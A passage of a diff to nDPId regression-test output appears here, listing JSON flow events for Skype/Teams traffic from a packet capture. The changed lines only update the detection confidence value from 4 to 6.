-00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":724,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970653869,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.162","src_port":13021,"dst_port":40033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":724,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970653869,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.162","src_port":13021,"dst_port":40033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":725,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970653869,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.159","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":725,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1431970653869,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431970653869,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6nacAAEARXcXAqAEib91NnzLdnF8AJrQGew8Ci4JWnsKyT6r3gHVnkQ4+dXrvzbvknlDqGmE\/"} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":725,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970653869,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.159","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":725,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970653869,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.159","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":726,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970653869,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.148","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":726,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1431970653869,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431970653869,"pkt":"0NQSxnP1PBXCt3IOCABFAABB8NoAAEARcG\/AqAEiQAQXlDLdnF0ALRa1exECrGOk9zKZhpR5Z4LrruV\/92iAsqS9CAawX8X4D80kRASy7Q=="} -00669{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":726,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970653869,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.148","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00669{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":726,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970653869,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.148","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":730,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":730,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1431970654821,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431970654821,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6wW8AAEARn+fAqAEiQAQXjjLdnFcAJg\/KexMCQ3jYuEugpNmWmUQtEzO7LdTOeKZd1ItpRQQC"} -00669{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":730,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00669{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":730,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":731,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":731,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1431970654821,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970654821,"pkt":"0NQSxnP1PBXCt3IOCABFAAA03zwAAEARghzAqAEiQAQXkjLdgQkAIIDZexUCZ4W5ZqoZlNOePqUvRCFg3WRtDoC9"} -00669{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":731,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00669{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":731,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":732,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.149","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":732,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1431970654821,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431970654821,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/GZwAAEARf3vAqAEinTeClTLdnEsAK1wIexcCaeXnH1khWR2dVjoEFgFOwJFG48UKy+DykqMrgwb0UzA="} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":732,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.149","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":732,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.149","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":733,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":733,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":1431970654821,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431970654821,"pkt":"0NQSxnP1PBXCt3IOCABFAABBOycAAEARwEbAqAEib91NlzLdnF0ALQ\/xexkCYPXpRAQdHH0\/jNHVbGCv27qhgsGUdDsPAuuhBF8LGQtOxA=="} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":733,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":733,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":734,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":734,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1431970654821,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970654821,"pkt":"0NQSxnP1PBXCt3IOCABFAABAm5UAAEARk+DAqAEi1cezpTLdnEQALDM7exsCCwiB5Tp\/+eOgtAg8Bibngtvk3Z9waqj3cY7b3c6tDEmT"} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":734,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":734,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":740,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655836,"flow_last_seen":1431970655836,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970655836,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":51246,"dst_port":40020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":740,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1431970655836,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970655836,"pkt":"0NQSxnP1PBXCt3IOCABFAABANxVAAEAGcHTAqAEinTg0LMgunFRemxUUAAAAALAC\/\/+0UAAAAgQFtAEDAwUBAQgKPjHZGQAAAAAEAgAA"} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":741,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655836,"flow_last_seen":1431970655836,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970655836,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.156","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":741,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1431970655836,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431970655836,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyDf8AAEARix7AqAEinTeCnDLdnFMAHh0Aex0Cxk3n0hRKPcgDeocb540rNGApyA=="} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":741,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655836,"flow_last_seen":1431970655836,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970655836,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.156","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":741,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655836,"flow_last_seen":1431970655836,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970655836,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.156","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":742,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655836,"flow_last_seen":1431970655836,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970655836,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.27","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":742,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1431970655836,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431970655836,"pkt":"0NQSxnP1PBXCt3IOCABFAABBoCUAAEAR+GnAqAEiQTffGzLdnF0ALfl1ex8CqPqPm6RB3JLpE4+TALz\/NA1U\/CYbcdFd\/zzgY3E\/zKJhBw=="} -00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":742,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655836,"flow_last_seen":1431970655836,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970655836,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.27","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":742,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655836,"flow_last_seen":1431970655836,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970655836,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.27","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":743,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970655837,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.142","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":743,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1431970655837,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431970655837,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6UqAAAEARkIPAqAEinTc4jjLdnE0AJphseyECmYsgkMQHN\/YIHMBu8w6RdZxUPKbDb+JHSqeN"} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":743,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970655837,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.142","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":743,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970655837,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.142","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 